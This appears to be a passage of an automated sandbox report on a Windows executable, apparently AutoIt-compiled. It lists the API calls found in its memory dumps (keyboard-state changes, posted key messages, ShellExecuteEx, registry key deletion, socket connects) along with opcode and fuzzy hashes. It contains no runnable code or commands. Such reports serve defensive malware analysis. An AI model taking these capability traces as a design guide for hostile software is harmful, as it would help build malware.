                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                    • String ID:
                                                                    • API String ID: 3619996494-0
                                                                    • Opcode ID: c334884ad77a2db2ea17562559c37c184c464cd626967b4805c96f6c1f970931
                                                                    • Instruction ID: 500e81da729ad1ece2c40255a82091390eafe8b5d9c6db7e4157835949a9c598
                                                                    • Opcode Fuzzy Hash: c334884ad77a2db2ea17562559c37c184c464cd626967b4805c96f6c1f970931
                                                                    • Instruction Fuzzy Hash: 4B8100B1508300ABC710FB68CC81E6FB7E9AF85714F04492EF9859B292EB75ED45C792
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7401265f8ce060daf911d7774785de9027c82f67982f84e138bea707a8be9af2
                                                                    • Instruction ID: 0a8294fc1c8b76e07f143c871f0853a203f688a243c6977612456e1b3fec0412
                                                                    • Opcode Fuzzy Hash: 7401265f8ce060daf911d7774785de9027c82f67982f84e138bea707a8be9af2
                                                                    • Instruction Fuzzy Hash: A1716E35900109FFDB15CF98CC48ABE7B79FF86314F28824AF955AB251C7349A51DB60
                                                                    APIs
                                                                    • IsWindow.USER32(01516A70), ref: 0105B3EB
                                                                    • IsWindowEnabled.USER32(01516A70), ref: 0105B3F7
                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0105B4DB
                                                                    • SendMessageW.USER32(01516A70,000000B0,?,?), ref: 0105B512
                                                                    • IsDlgButtonChecked.USER32(?,?), ref: 0105B54F
                                                                    • GetWindowLongW.USER32(01516A70,000000EC), ref: 0105B571
                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0105B589
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                    • String ID:
                                                                    • API String ID: 4072528602-0
                                                                    • Opcode ID: aabd42853ce8917db53e1c1254f98edeb96aaada244d7ccdc15640abed308dcd
                                                                    • Instruction ID: 2786d198689f279fda07ecbc2bccc462c6ba9fdf79ff1d7ef7e3ba32fd9affe4
                                                                    • Opcode Fuzzy Hash: aabd42853ce8917db53e1c1254f98edeb96aaada244d7ccdc15640abed308dcd
                                                                    • Instruction Fuzzy Hash: CF715E34604205AFEFB59E59C894BABBFE6FF09300F144099EEC597252CB36B941DB50
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0104F448
                                                                    • _memset.LIBCMT ref: 0104F511
                                                                    • ShellExecuteExW.SHELL32(?), ref: 0104F556
                                                                      • Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
                                                                      • Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC
                                                                      • Part of subcall function 00FEFC86: _wcscpy.LIBCMT ref: 00FEFCA9
                                                                    • GetProcessId.KERNEL32(00000000), ref: 0104F5CD
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0104F5FC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                    • String ID: @
                                                                    • API String ID: 3522835683-2766056989
                                                                    • Opcode ID: 1b638d38903cf7c07cd290201b7052fecdba7575832c5ae9c6e29d91a170dfe1
                                                                    • Instruction ID: 76ebed73ce5d8bb4ff9a69bded1b45359fab36d2bc09e77b8cd80e53b4b7f4a2
                                                                    • Opcode Fuzzy Hash: 1b638d38903cf7c07cd290201b7052fecdba7575832c5ae9c6e29d91a170dfe1
                                                                    • Instruction Fuzzy Hash: F261A5B5A00619DFCB14EF98C8819AEBBF5FF48310F184069E955AB351CB74AD41DF90
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 01030F8C
                                                                    • GetKeyboardState.USER32(?), ref: 01030FA1
                                                                    • SetKeyboardState.USER32(?), ref: 01031002
                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 01031030
                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 0103104F
                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 01031095
                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 010310B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: 6603e6b6c11cd617e2427c3c853c564e6a8ec602088e32cd728bc82ed57e6051
                                                                    • Instruction ID: 94036b1de6ad588c988f3b4e2427de56fd8d65cb7d6a6f35e5682fc9f02000af
                                                                    • Opcode Fuzzy Hash: 6603e6b6c11cd617e2427c3c853c564e6a8ec602088e32cd728bc82ed57e6051
                                                                    • Instruction Fuzzy Hash: DA51C3B06047D63DFB3642388845BBABEED5B8A304F0885C9F2D5468D3C2E9E8D4D751
                                                                    APIs
                                                                    • GetParent.USER32(00000000), ref: 01030DA5
                                                                    • GetKeyboardState.USER32(?), ref: 01030DBA
                                                                    • SetKeyboardState.USER32(?), ref: 01030E1B
                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 01030E47
                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 01030E64
                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 01030EA8
                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 01030EC9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: f446fc98a621f6f08ba018383586acc0c2297b859f1597940bdcd80e0434bd33
                                                                    • Instruction ID: 240d085fabe19961625fa3b4ca72233e9821e0990d285d50eb778ee45896f108
                                                                    • Opcode Fuzzy Hash: f446fc98a621f6f08ba018383586acc0c2297b859f1597940bdcd80e0434bd33
                                                                    • Instruction Fuzzy Hash: CC51E6A06467D63DFB7692388C45BBA7FED5F86300F0884C9F2D4468C6D395E898D760
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsncpy$LocalTime
                                                                    • String ID:
                                                                    • API String ID: 2945705084-0
                                                                    • Opcode ID: 9fac40ba25e33a3655914bf6aeb1234f86b32f789c7e8d1318347563450b7c85
                                                                    • Instruction ID: 7bf2a05b830d0ce6ca49d33dba2a5fa93c06b73aeb7fa891dfabedbda47eafcb
                                                                    • Opcode Fuzzy Hash: 9fac40ba25e33a3655914bf6aeb1234f86b32f789c7e8d1318347563450b7c85
                                                                    • Instruction Fuzzy Hash: 9141B365C1121876CB11EBF49C4A9EFB7BCAF44310F448856E749E3231EA38E345D7AA
                                                                    APIs
                                                                      • Part of subcall function 0103466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,01033697,?), ref: 0103468B
                                                                      • Part of subcall function 0103466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,01033697,?), ref: 010346A4
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 010336B7
                                                                    • _wcscmp.LIBCMT ref: 010336D3
                                                                    • MoveFileW.KERNEL32(?,?), ref: 010336EB
                                                                    • _wcscat.LIBCMT ref: 01033733
                                                                    • SHFileOperationW.SHELL32(?), ref: 0103379F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                    • String ID: \*.*
                                                                    • API String ID: 1377345388-1173974218
                                                                    • Opcode ID: 30ad877860137dc5fe3943107aad72f7cb113c325de2eceaa66709ecdd9aa3a1
                                                                    • Instruction ID: 0fce94206bbfeb95bba7c0863887ed8f2514d7a3f0323f077a93284c9aa38f78
                                                                    • Opcode Fuzzy Hash: 30ad877860137dc5fe3943107aad72f7cb113c325de2eceaa66709ecdd9aa3a1
                                                                    • Instruction Fuzzy Hash: 01418E71508345AED762EF64D4859DFB7ECBFC8280F00486EB5CAC7251EA38D289C752
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 010572AA
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01057351
                                                                    • IsMenu.USER32(?), ref: 01057369
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 010573B1
                                                                    • DrawMenuBar.USER32 ref: 010573C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                                    • String ID: 0
                                                                    • API String ID: 3866635326-4108050209
                                                                    • Opcode ID: 4373b766b720beaf8bf20114798edeb83a5d2171963f399468a87de5148a331e
                                                                    • Instruction ID: 701633a516bb46638f857b37cbaa62db2514f42d20940f403fad152cdba756f9
                                                                    • Opcode Fuzzy Hash: 4373b766b720beaf8bf20114798edeb83a5d2171963f399468a87de5148a331e
                                                                    • Instruction Fuzzy Hash: 99417671A00209EFDB61CF54D885AAABBF8FF08360F448069FE85AB251C735AD04EF50
                                                                    APIs
                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 01050FD4
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01050FFE
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 010510B5
                                                                      • Part of subcall function 01050FA5: RegCloseKey.ADVAPI32(?), ref: 0105101B
                                                                      • Part of subcall function 01050FA5: FreeLibrary.KERNEL32(?), ref: 0105106D
                                                                      • Part of subcall function 01050FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01051090
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 01051058
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                    • String ID:
                                                                    • API String ID: 395352322-0
                                                                    • Opcode ID: f89b6185d9d64cf24cef70d4622eb2f5fbfa3291689e18f60719f54f0a3ca89b
                                                                    • Instruction ID: 801375ef34c4c15bc973c77ed1cd736cb355fa6d34df6b3aff7463bfc2470f12
                                                                    • Opcode Fuzzy Hash: f89b6185d9d64cf24cef70d4622eb2f5fbfa3291689e18f60719f54f0a3ca89b
                                                                    • Instruction Fuzzy Hash: BF310F71A01209BFEB659F94DC89EFFBBBCEF08310F0411A9F941A2140DA759A459BA0
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 010562EC
                                                                    • GetWindowLongW.USER32(01516A70,000000F0), ref: 0105631F
                                                                    • GetWindowLongW.USER32(01516A70,000000F0), ref: 01056354
                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 01056386
                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 010563B0
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 010563C1
                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 010563DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: LongWindow$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 2178440468-0
                                                                    • Opcode ID: 87c34c5c744eba692d20ebc00d2336f5d056cbe765dc43dd46ea9d2c543580ef
                                                                    • Instruction ID: 4f7ee094fc5886be22e841ab0d22427fe5d39f60de10d8cfce7d4902ed4e5753
                                                                    • Opcode Fuzzy Hash: 87c34c5c744eba692d20ebc00d2336f5d056cbe765dc43dd46ea9d2c543580ef
                                                                    • Instruction Fuzzy Hash: 1D313730600241AFDBB2CF29D894F563BE1FB4A754F5841A4F9919F2B6CB77A840CB50
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0102DB2E
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0102DB54
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0102DB57
                                                                    • SysAllocString.OLEAUT32(?), ref: 0102DB75
                                                                    • SysFreeString.OLEAUT32(?), ref: 0102DB7E
                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 0102DBA3
                                                                    • SysAllocString.OLEAUT32(?), ref: 0102DBB1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                    • String ID:
                                                                    • API String ID: 3761583154-0
                                                                    • Opcode ID: 931151bcbe09f23b4864bc57d8682688a9111969c4ce6f8af582e0091d4d5553
                                                                    • Instruction ID: 6c6e76b3c0fdea697e0b4f544dd4cb0387356f91a7dc34d9832c67dc4150b22d
                                                                    • Opcode Fuzzy Hash: 931151bcbe09f23b4864bc57d8682688a9111969c4ce6f8af582e0091d4d5553
                                                                    • Instruction Fuzzy Hash: B121B732600219AFDF11DEE8DC44CBB77ECEB09264B008165FE94DB151DA74DC418B60
                                                                    APIs
                                                                      • Part of subcall function 01047D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 01047DB6
                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 010461C6
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 010461D5
                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0104620E
                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 01046217
                                                                    • WSAGetLastError.WSOCK32 ref: 01046221
                                                                    • closesocket.WSOCK32(00000000), ref: 0104624A
                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 01046263
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 910771015-0
                                                                    • Opcode ID: cb28c5221af7b9878a6eae4e5cfe693ca7185c3170f4f49d283cbd86f25d548b
                                                                    • Instruction ID: 269e45d8f6271ff4fd8fcb59907d623d70a815278f6b5a742d197812ad53ed1f
                                                                    • Opcode Fuzzy Hash: cb28c5221af7b9878a6eae4e5cfe693ca7185c3170f4f49d283cbd86f25d548b
                                                                    • Instruction Fuzzy Hash: 4A31B571600219AFDF10AF64CCC4BBE7BADEF45710F044069FD85E7291DB79A9049B61
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                    • API String ID: 1038674560-2734436370
                                                                    • Opcode ID: 08de4cef7f7df7070c4f66a3ed05e17c8e02ca3f3b9e637f2a1519b737637b60
                                                                    • Instruction ID: bf6cb43977c94fc2915e3a8800faa8eab8ba45f299db2f18d8c7e7e040aa98cc
                                                                    • Opcode Fuzzy Hash: 08de4cef7f7df7070c4f66a3ed05e17c8e02ca3f3b9e637f2a1519b737637b60
                                                                    • Instruction Fuzzy Hash: 6F21497220453366D331BB38AC06EBB73E8EF593C0F044029FAC6CA162EB959D45D395
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0102DC09
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0102DC2F
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0102DC32
                                                                    • SysAllocString.OLEAUT32 ref: 0102DC53
                                                                    • SysFreeString.OLEAUT32 ref: 0102DC5C
                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 0102DC76
                                                                    • SysAllocString.OLEAUT32(?), ref: 0102DC84
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                    • String ID:
                                                                    • API String ID: 3761583154-0
                                                                    • Opcode ID: d5a3a456e44f4349a5f04a4049aea5cb59a7870bfccf6aaac9412c0f52aa889e
                                                                    • Instruction ID: a6085901c4bda3f986be478b1be0c05c9fcc0953fd2efdc7ef1c4ca2d364ab9f
                                                                    • Opcode Fuzzy Hash: d5a3a456e44f4349a5f04a4049aea5cb59a7870bfccf6aaac9412c0f52aa889e
                                                                    • Instruction Fuzzy Hash: AC21A735605219AF9B11EFECDC88CAB77ECEB09360B108165F984CB255DA78DC41CB64
                                                                    APIs
                                                                      • Part of subcall function 00FD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FD1D73
                                                                      • Part of subcall function 00FD1D35: GetStockObject.GDI32(00000011), ref: 00FD1D87
                                                                      • Part of subcall function 00FD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FD1D91
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01057632
                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0105763F
                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0105764A
                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 01057659
                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01057665
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                    • String ID: Msctls_Progress32
                                                                    • API String ID: 1025951953-3636473452
